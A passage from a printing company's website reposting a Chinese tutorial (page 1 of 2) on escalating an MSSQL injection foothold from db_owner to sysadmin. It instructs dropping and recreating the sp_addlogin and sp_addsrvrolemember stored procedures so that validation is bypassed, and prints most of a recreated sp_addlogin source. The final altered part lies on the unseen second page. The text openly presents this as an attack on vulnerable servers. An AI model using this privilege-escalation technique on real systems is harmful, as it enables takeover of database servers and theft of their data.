SQL注入攻击通杀-会员卡,广州印刷,深圳印刷,印刷公司,名片,彩页,名片设计,设计教程,名片制作,彩色名片,名片模板,贵宾卡,pvc卡,设计欣赏,深圳名片,广州名片,business card design

首页	名片设计 CorelDRAW Illustrator AuotoCAD Painter 其他软件 Photoshop Fireworks Flash

» 彩色名片
» PVC卡
» 彩色磁性卡
» 彩页/画册
» 个性印务
» 彩色不干胶
» 明信片
   » 明信片
   » 彩色书签
   » 门挂
» 其他产品与服务
   » 创业锦囊
   » 办公用品
   » 信封、信纸
   » 便签纸、斜面纸砖
   » 无碳复印纸
   » 海报
   » 大篇幅印刷
   » KT板
   » 海报
   » 横幅

SQL注入攻击通杀
MSSQL注入通杀，只要有注入点就有系统权限
　　不知道大家看过这篇文章没有，可以在db_owner角色下添加SYSADMIN帐号，这招真狠啊，存在MSSQL注射漏洞的服务器又要遭殃了。方式主要是利用db_owner可以修改sp_addlogin和sp_addsrvrolemember这两个存储过程，饶过了验证部分。详细方式如下:先输入drop procedure sp_addlogin,然后在IE里面输入create procedure sp_addlogin
　　@loginame sysname
　　,@passwd sysname = Null
　　,@defdb ; ; sysname = ’master’ -- UNDONE: DEFAULT
　　CONFIGURABLE???
　　,@deflanguage sysname = Null
　　,@sid varbinary(16) = Null
　　,@encryptopt varchar(20) = Null
　　AS
　　-- SETUP RUNTIME OPTIONS / DECLARE VARIABLES --
　　set nocount on
　　Declare @ret int -- return value of sp call
　　-- DISALLOW USER TRANSACTION --
　　set implicit_transactions off
　　IF (@@trancount > 0)
　　begin
　　raiserror(15002,-1,-1,’sp_addlogin’)
　　return (1)
　　end
　　-- VALIDATE LOGIN NAME AS:
　　-- (1) Valid SQL Name (SQL LOGIN)
　　-- (2) No backslash (NT users only)
　　-- (3) Not a reserved login name
　　execute @ret = sp_validname @loginame
　　if (@ret <> 0)
　　return (1)
　　if (charindex(’/’, @loginame) > 0)
　　begin
　　raiserror(15006,-1,-1,@loginame)
　　return (1)
　　end
　　--Note: different case sa is allowed.
　　if (@loginame = ’sa’ or lower(@loginame) in (’public’))
　　begin
　　raiserror(15405, -1 ,-1, @loginame)
　　return (1)
　　end
　　-- LOGIN NAME MUST NOT ALREADY EXIST --
　　if exists(select * from master.dbo.syslogins where loginname =
　　@loginame)
　　begin
　　raiserror(15025,-1,-1,@loginame)
　　return (1)
　　end
　　-- VALIDATE DEFAULT DATABASE --
　　IF db_id(@defdb) IS NULL
　　begin
　　raiserror(15010,-1,-1,@defdb)
　　return (1)
　　end
　　-- VALIDATE DEFAULT LANGUAGE --
　　IF (@deflanguage IS NOT Null)
　　begin
　　Execute @ret = sp_validlang @deflanguage
　　IF (@ret <> 0)
　　return (1)
　　end
　　ELSE
　　begin
　　select @deflanguage = name from master.dbo.syslanguages
　　where langid = @@default_langid --server default
　　language
　　if @deflanguage is null
　　select @deflanguage = N’us_english’
　　end
　　-- VALIDATE SID IF GIVEN --
　　if ((@sid IS NOT Null) and (datalength(@sid) <> 16))
　　begin
　　raiserror(15419,-1,-1)
　　return (1)
　　end
　　else if @sid is null
　　select @sid = newid()
　　if (suser_sname(@sid) IS NOT Null)
　　begin
　　raiserror(15433,-1,-1)
　　return (1)
　　end
　　-- VALIDATE AND USE ENCRYPTION OPTION --
　　declare @xstatus smallint
　　select @xstatus = 2 -- access
　　if @encryptopt is null
　　select @passwd = pwdencrypt(@passwd)
　　else if @encryptopt = ’skip_encryption_old’
　　begin
　　select @xstatus = @xstatus | 0x800, -- old-style
　　encryption
　　@passwd = convert(sysname, convert(varbinary
　　(30), convert(varchar(30), @passwd)))
　　end
　　else if @encryptopt <> ’skip_encryption’
　　begin
　　raiserror(15600,-1,-1,’sp_addlogin’)
　　return 1
　　end

本新闻共2

本新闻共2页,当前在第1页 1 2

返回类别: 教程
上一教程: 如何在视图中使用ORDER BY短语
下一教程: SQL Server 2000之日志传送功能 - 问题解决

您可以阅读与"SQL注入攻击通杀"相关的教程:
· SQL注入攻击通杀
· 利用INSTR()函数防止SQL注入攻击
· 防范SQL注入式攻击
· SQL注入技术和跨站脚本攻击的检测
· SQL SERVER应用程序中的高级SQL注入


	快精灵印艺坊版权所有	首页会员中心在线印刷在线编辑付款方式索取样品设计指南连锁门店网站地图关于我们友情链接